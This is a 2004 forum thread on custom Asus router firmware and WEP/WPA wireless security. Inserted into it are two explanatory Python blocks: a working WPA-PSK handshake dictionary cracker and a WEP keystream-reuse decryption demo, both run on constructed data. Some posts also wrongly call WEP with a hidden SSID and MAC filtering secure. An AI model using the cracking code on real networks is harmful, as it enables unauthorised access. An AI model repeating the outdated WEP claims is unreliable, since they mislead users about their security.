View full version: Development status of customized 1.8.x.x firmware ?!?



Tbone
05-10-2004, 00:08
Customized firmwares of the 1.7.6.x and 1.7.9.x were released pretty soon after Asus made them public... and now with the 1.8.x range (now 1.8.1.9) it's been a while since the specialists tuned it up a bit :D

What's wrong with it? :confused: Is it harder to change the code of this new layout firmware... is free firmware space limited, or do you want to release a lot of fixes at the same time?

I don't want to sound rude whatsoever :) I'm already really pleased you all put so much effort into making this a wonderful gadget... keep it up!!!

But the mixed encryption option... and availability of USB options in access point-only mode are very useful! And the bugs mentioned on this forum (WPA-TKIP/AES and WEP128 at the same time) and other issues like the webcam need some tuning-up, as you of course know.

This makes me very impatient hehehe :rolleyes: I would love to try out a new release to see if it works better... or at least know a bit how far it's progressing.

So if there is some news please post it :-) It will keep me from refreshing the page every 5 minutes with my fingers crossed hehehe

Tnx!
:cool:

Oleg
05-10-2004, 07:44
Be patient, 1.8.1.7-1 is already up and running for me and Antiloop. We're now performing beta testing. :)
There are a lot of internal changes, as I wrote before.

Antiloop
05-10-2004, 09:17
OK, to reveal some things:

the webcam issue is at this moment still present, hard to reproduce, and nobody has got time to look into it

the mixed encryption is a bit vague, no documentation available for this 'feature'; Google also gives 0 useful results
I have managed, so this should work with 1.8.1.7 at least, to get WPA-AES/TKIP and WEP128 working as follows:
WPA-PSK AES connects but gets no IP, so encryption or something is wrong
WPA-PSK TKIP connects, seems to work fine
WEP128 connects, seems to work fine (set to key 2 or 3 at the client of course, otherwise it will not connect; I used my A716 to test WEP128)
so if anyone has documentation, especially on the util 'nas' from Broadcom, please publish it!

PS: when using WPA-PSK TKIP/AES and WEP128 and WDS
the device connects without a problem to the other WDS device (which is only running WPA-PSK TKIP/AES)

Tbone
26-10-2004, 19:43
OK, to reveal some things:
.....
I have managed, so this should work with 1.8.1.7 at least, to get WPA-AES/TKIP and WEP128 working as follows:
WPA-PSK TKIP connects, seems to work fine
WEP128 connects, seems to work fine (set to key 2 or 3 at the client of course, otherwise it will not connect; I used my A716 to test WEP128)
.....


I use two units with 1.7.5.9 rc5 using WDS to cover a big hall, both in AP-only hybrid mode hooked up to a router/firewall box with a built-in ADSL modem. I have reached the limit of 64 clients in the ACL, of which about 30 are concurrent users. To keep some bandwidth I say we're FULL to all new applicants :D and turning the ACL list off is out of the question :p Security is very important.

Now these clients are extremely mixed: Linux, Windows 2000, XP SP2, iPAQ PocketPCs and, since a little while, an Apple laptop. WEP128 key 2 "gave" the best result; the arrival of the Apple AirPort WLAN gave a new challenge though.
The AirPort (FW 3.4.3) cannot select a key number (http://docs.info.apple.com/article.html?artnum=106250) for WEP encryption, so we need WPA-TKIP, AES or WEP128 key 1 for this one.

Now I could tell all users to change their settings to key 1 and change this on the APs, keeping the current firmware. Then it will be WEP128 key 1 for all users.

Since WEPxxx is pretty easy to hack... I personally would like to use WPA-TKIP and AES as much as possible... it's also easier to configure, I think.
So another option is to upgrade to the latest 1.8.x.x firmware and start using mixed encryption. Then I can hopefully offer WiFi to all clients too, in a more secure way.

What would you advise me? Since it's a production environment it's very important that it is stable, but that and security combined is ideal :)

brubber
27-10-2004, 00:00
Since WEPxxx is pretty easy to hack... I personally would like to use WPA-TKIP and AES as much as possible... it's also easier to configure, I think.

:) So how would you proceed hacking? I think it's not that simple; you will need a significant number of packets with the same IV and similar content. IMHO WEP128 combined with blocking broadcast SSID, MAC address filtering and regular key change is pretty secure.


What would you advise me? Since it's a production environment it's very important that it is stable, but that and security combined is ideal :)

If it's that important I would certainly not rely on cheap equipment using custom firmware from an "unknown" source unless you can read and understand the consequences of every line of code. Please don't misunderstand me, I think that most of the people producing the custom firmware have only good intentions, but you can never be sure. I think it would be fairly easy to integrate a few lines of code broadcasting or even sending your IPs, SSID, WEP keys, passphrases, connection secrets etc. directly to the firmware builder (unless the router is behind a very well configured firewall). Even if the custom firmware producers have only good intentions, they may have introduced flaws in the code opening entry points for hackers. This happens even to professional programming teams (Microsoft, Symantec etc.).

Laptops and PDAs are in general security risks unless they are only used within the secure production environment.

The best thing to do is probably hire a network security expert for a few days and take his advice into account. This is generally cheaper than losing one or more production days or sensitive information.

P.S. Depending on the configuration WPA may even be more vulnerable than WEP128:
http://www.wi-fiplanet.com/columns/article.php/1556321
http://www.wi-fiplanet.com/news/article.php/3105271
"attackers who want to compromise WEP and LEAP need to harvest large quantities of network traffic before they can decipher the passphrase. In contrast, WPA only requires them to capture four specific packets of data": http://www.computerworld.com.au/index.php?id=1184557545&eid=-255

Tbone
27-10-2004, 08:18
"attackers who want to compromise WEP and LEAP need to harvest large quantities of network traffic before they can decipher the passphrase. In contrast, WPA only requires them to capture four specific packets of data"


I think collecting a large amount of data is pretty simple with so many users :)
About the key for WPA... I made it 63 characters long, not standard words but with lots of different characters in it, to make a brute force dictionary attack difficult.
Also I put the WPA re-key time to 86400. This combined with the other security features like ACL and hidden SSID should make it better encryption than WEP128, right?

About the custom FW.... if Asus trusts Oleg and Antiloop then I do too :cool: Also the nice thing about this forum is that many people look at the code... so if someone puts spy/buggy code in it I hope he gets flamed by the other forum users hehehe
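The two points traded above, that a WPA-PSK attacker only needs the four handshake packets (brubber's quote) and that a long random passphrase is the defence (Tbone's 63 characters), worked through in code. This is an added example, not code from any post or from the firmware: it derives the PMK from passphrase and SSID with PBKDF2 the way WPA-PSK does, derives the PTK from the two MAC addresses and two nonces that travel in the clear in the 4-way handshake, and runs an offline dictionary check against the captured EAPOL-Key MIC. The SSID, MAC addresses, nonces, passphrase and the stand-in EAPOL-Key frame body are constructed for the demo. Note that the AP's group re-key interval does not enter this derivation at all; only passphrase length and randomness do.

```python
"""WPA-PSK offline dictionary attack against a captured 4-way handshake.
Added example with a constructed handshake; nothing here is from a real capture.

PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
PTK = PRF-512(PMK, "Pairwise key expansion",
              min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
KCK = PTK[0:16] is the key that MICs the EAPOL-Key frames.
Everything the attacker needs (both MACs, both nonces, one MIC'd EAPOL frame)
is in messages 1 and 2 of the handshake; the rest is local computation.
"""
import hashlib
import hmac
import math


def wpa_pmk(passphrase, ssid):
    """Passphrase-to-PSK mapping; the passphrase is 8..63 ASCII characters."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf512(pmk, aa, spa, anonce, snonce):
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1(K, A || 0x00 || B || i)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck, eapol_frame, descriptor_version):
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed:
    descriptor version 1 (TKIP) = HMAC-MD5, version 2 (CCMP/AES) = HMAC-SHA1[0:16]."""
    if descriptor_version == 1:
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_handshake(passphrase, ssid, aa, spa, anonce, snonce, descriptor_version=2):
    """Play the station's role for message 2 so there is a MIC to attack."""
    ptk = prf512(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    # Stand-in EAPOL-Key body (constructed, not a real frame) with the 16-byte MIC zeroed.
    frame = b"\x01\x03\x00\x75\x02\x01\x0a" + snonce + b"\x00" * 16
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": frame, "mic": eapol_mic(ptk[:16], frame, descriptor_version),
            "version": descriptor_version}


def demo_handshake(passphrase="correct horse"):
    """Constructed capture: SSID, MACs and nonces are made up for this demo."""
    return build_handshake(
        passphrase, b"BigHall",
        bytes.fromhex("000c6e000001"),         # AA, the AP's MAC (constructed)
        bytes.fromhex("000b6b000002"),         # SPA, the station's MAC (constructed)
        hashlib.sha256(b"anonce").digest(),    # ANonce, 32 bytes (constructed)
        hashlib.sha256(b"snonce").digest(),    # SNonce, 32 bytes (constructed)
    )


def crack(hs, wordlist):
    """Offline: one PBKDF2, one PRF and one HMAC per candidate, no more traffic needed.
    Returns the matching passphrase, or None if the wordlist misses it."""
    for candidate in wordlist:
        ptk = prf512(wpa_pmk(candidate, hs["ssid"]), hs["aa"], hs["spa"],
                     hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"], hs["version"]), hs["mic"]):
            return candidate
    return None


def passphrase_entropy_bits(length, alphabet_size):
    """Keyspace of a uniformly random passphrase; the 256-bit PMK caps what counts."""
    return min(256.0, length * math.log2(alphabet_size))


if __name__ == "__main__":
    hs = demo_handshake()
    print("recovered:", crack(hs, ["password", "letmein", "correct horse"]))
    print("63 random printable chars: %.0f bits" % passphrase_entropy_bits(63, 94))
    print("8 lowercase letters:       %.0f bits" % passphrase_entropy_bits(8, 26))
```

Each candidate costs 4096 PBKDF2 iterations, which is what makes a wordlist hit cheap and a 63-character random passphrase out of reach: the wordlist attack only works when the passphrase is in the list.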

Antiloop
27-10-2004, 08:30
I think collecting a large amount of data is pretty simple with so many users :)
About the key for WPA... I made it 63 characters long, not standard words but with lots of different characters in it, to make a brute force dictionary attack difficult.
Also I put the WPA re-key time to 86400. This combined with the other security features like ACL and hidden SSID should make it better encryption than WEP128, right?

About the custom FW.... if Asus trusts Oleg and Antiloop then I do too :cool: Also the nice thing about this forum is that many people look at the code... so if someone puts spy/buggy code in it I hope he gets flamed by the other forum users hehehe

Why not use VPN over your wireless?

Styno
27-10-2004, 08:56
Brubber, while WEP128 is secure enough for home users IMHO, for businesses it's certainly not. According to a Dutch computer magazine, c't, WEP 104 can be cracked after 5 to 10 million packets. So when the radio cell is busy enough and transmits mostly small packets, a hacker with a good connection can decipher the key in 10 minutes.

For home users, with much less traffic, it can take a hacker with a slower connection (due to distance) weeks to hack the key.

brubber
27-10-2004, 22:17
a hacker with a good connection can decipher the key in 10 minutes.

Sure, if you're not using additional security such as Block Broadcast SSID, a password-like SSID, MAC address filtering, static IPs outside the default range, different default keys on workstations and AP, and well-configured firewalls. This should make it secure enough for defense against simple "war drivers" IMHO. Professional hackers will always find a way into your system if they really want to, no matter what you do.


if Asus trusts Oleg and Antiloop then I do too

Yep, me too, but the risk of flaws remains.


Also I put the WPA re-key time to 86400. This combined with the other security features like ACL and hidden SSID should make it better encryption than WEP128, right?

Sure, but you can still do a lot better. I agree with Antiloop (use VPN), however this may have significant performance effects. You may also consider using EAP and (T)TLS or PEAP, however this will require a RADIUS server.

Another good option you may wish to look into is Linksys Wireless Guard (http://www.linksys.com/wirelessguard/). This is relatively cheap, fairly secure (authentication with RADIUS and PEAP, TKIP or AES encryption), easy to manage (requires little knowledge); I'm only not 100% sure if this will also work with Mac / Linux clients (just ask them).

Or get 802.11i equipment (WPA2 and AES encryption).

Jeroen Vonk
27-10-2004, 23:10
Brubber, while WEP128 is secure enough for home users IMHO, for businesses it's certainly not. According to a Dutch computer magazine, c't, WEP 104 can be cracked after 5 to 10 million packets. So when the radio cell is busy enough and transmits mostly small packets, a hacker with a good connection can decipher the key in 10 minutes.

For home users, with much less traffic, it can take a hacker with a slower connection (due to distance) weeks to hack the key.

Believe me, it really isn't that easy.

There are a few reasons why WEP could be easy to crack. The first is the authentication protocol, if you use "shared key" for authentication. Basically the AP sends unencrypted text to the client, then the client encrypts the text and returns it. This is pretty stupid: the attacker now has an encrypted and an unencrypted packet. Even more stupid, the challenge text is always 128 bytes, to help the attacker :) So just configure an "open" system for authentication. (The client is allowed to associate with the AP, but is unable to send and/or receive any data without the correct WEP key.)

The key generator for 40-bit keys (which is not WiFi standard!!) in most implementations is flawed. In most firmwares it is possible to enter text and a WEP key is created based on the text. NEVER use this for 40-bit keys; generation of 104-bit keys is not flawed, so that can be used. But it is much better to just type a random WEP key instead of using flawed key generators.

WEP is using the RC4 stream cipher (RSA), which itself is not insecure; the implementation is insecure. A 128-bit WEP key is split in two parts: a 104-bit shared secret and a 24-bit IV (the latter is sent in clear text). A rule with encryption is to _never_ reuse a key. Unfortunately a lot of WEP implementations do reuse IVs, so the WEP/RC4 implementation is not secure. So if vendors use key generators which never ever reuse keys, based on a schedule, the WEP implementation is a lot more secure.

Another flaw with WEP is that every IP packet starts with the exact same information (ARP packet information). You need lots and lots of information to crack the WEP key. Even on a heavily used wireless network you need hours and hours to collect enough data.

So if you configure your wireless network the right way, there is not a real problem. For most networks (even company networks) WEP is secure enough to be used. If you use a key exchange like 802.1x it's even more secure, and too difficult for most people to try to crack it.


Sure, if you're not using additional security such as Block Broadcast SSID

If a client tries to associate with an AP it sends the unencrypted SSID, so you only have to wait till someone is turning on their computer and you have the SSID. I broadcast the SSID (which I believe is even required by the WiFi specification) because it offers no protection at all IMHO.
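The two WEP weaknesses Jeroen describes, shared-key authentication handing out a known-plaintext pair and the 24-bit IV being reused, worked through in code, together with the packet counts behind Styno's c't figure. This is an added example, not code from any post or from the firmware: it implements plain RC4, WEP's per-frame key of IV || shared key, recovery of a full 128-byte keystream from one shared-key authentication exchange, decryption of any later frame that carries the same IV without ever learning the key, and the birthday bound on how quickly randomly chosen IVs repeat. The shared key, IV, challenge and frames are constructed, and the CRC-32 ICV that real WEP appends is left out because it does not change the argument.

```python
"""WEP keystream reuse, worked through. Added example; keys and frames are constructed.

WEP seeds RC4 with IV (3 bytes, sent in clear) || shared key (5 or 13 bytes), so every
frame that carries the same IV is XORed with the same keystream.
"""
import math

IV_SPACE = 2 ** 24  # 24-bit IV


def rc4_keystream(key, n):
    """Plain RC4 (KSA + PRGA); returns n bytes of keystream for `key`."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key, iv, plaintext):
    """Frame body = IV || (plaintext XOR RC4(IV || key)).
    The CRC-32 ICV real WEP appends is omitted; it does not affect keystream reuse."""
    assert len(iv) == 3 and len(shared_key) in (5, 13)
    return iv + xor(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))


def keystream_from_shared_key_auth(challenge, response_frame):
    """Shared-key authentication gives an eavesdropper a known-plaintext pair: the AP
    sends `challenge` in clear, the station returns it WEP-encrypted under an IV of
    its choosing.  challenge XOR ciphertext == the keystream for that IV."""
    iv, ciphertext = response_frame[:3], response_frame[3:]
    return iv, xor(challenge, ciphertext)


def decrypt_with_keystream(frame, iv, keystream):
    """Decrypt any later frame that reuses `iv`, without knowing the shared key."""
    if frame[:3] != iv:
        raise ValueError("frame uses a different IV; this keystream does not apply")
    body = frame[3:]
    if len(body) > len(keystream):
        raise ValueError("recovered keystream is shorter than the frame")
    return xor(body, keystream)


def plaintext_xor(frame_a, frame_b):
    """Two frames under one IV: C1 XOR C2 == P1 XOR P2, the keystream cancels out."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames use different IVs")
    return xor(frame_a[3:], frame_b[3:])


def iv_collision_probability(frames):
    """Birthday bound: chance that at least two of `frames` randomly chosen 24-bit IVs
    coincide.  Sequential IVs avoid this only until they wrap, after 2**24 frames."""
    return 1.0 - math.exp(-(frames ** 2) / (2.0 * IV_SPACE))


if __name__ == "__main__":
    key = bytes.fromhex("0102030405060708090a0b0c0d")   # constructed 104-bit key
    iv = b"\x00\x00\x2a"                                   # constructed IV
    challenge = bytes(range(128))                          # 128-byte challenge text
    auth_response = wep_encrypt(key, iv, challenge)        # station answers under `iv`
    iv_seen, ks = keystream_from_shared_key_auth(challenge, auth_response)
    later = wep_encrypt(key, iv, b"GET /payroll.xls HTTP/1.0")  # same IV reused later
    print(decrypt_with_keystream(later, iv_seen, ks))
    print("p(IV collision after 5000 random IVs) = %.2f" % iv_collision_probability(5000))
```

The collision function is why busy cells fall faster: with random IVs there is an even chance of a repeat inside the first 5000 frames, and a card that counts IVs sequentially must reuse them after 16.7 million frames, which a 30-user hall reaches in well under a day. Open-system authentication removes the free known-plaintext pair but not the IV reuse.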

Styno
27-10-2004, 23:24
Jeroen, I got that info from a well-established computer magazine. I don't have enough wireless knowledge to agree or disagree, but that's what they wrote.

A RADIUS server with a key change interval of one hour would be pretty secure as well, I guess. Perhaps you can try to get FreeRADIUS compiled and running on the router or another server...

brubber
28-10-2004, 00:12
For those interested: http://www.trusted-mobile.org/